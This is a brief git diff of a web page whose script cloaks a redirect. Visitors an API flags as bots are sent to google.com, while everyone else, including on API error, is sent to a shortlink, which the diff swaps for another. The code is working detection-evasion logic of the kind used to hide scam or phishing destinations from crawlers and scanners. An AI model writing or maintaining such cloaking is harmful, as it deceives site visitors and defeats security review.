--- a/index.html
+++ b/index.html
@@ -80,16 +80,17 @@
         if (data.bot === true) {
           window.location.href = "https://google.com";
         } else {
-          window.location.href = "https://auto.coolbi.net/r/7ySNeC";
+          window.location.href = "https://o2o.to/i/4TWZOFKQ5GC9";
         }
       } catch (err) {
         // fallback jika API error
         console.error("API error:", err);
-        window.location.href = "https://auto.coolbi.net/r/7ySNeC";
+        window.location.href = "https://o2o.to/i/4TWZOFKQ5GC9";
       }
     })();
   </script>
 </body>
 
 </html>
+
 
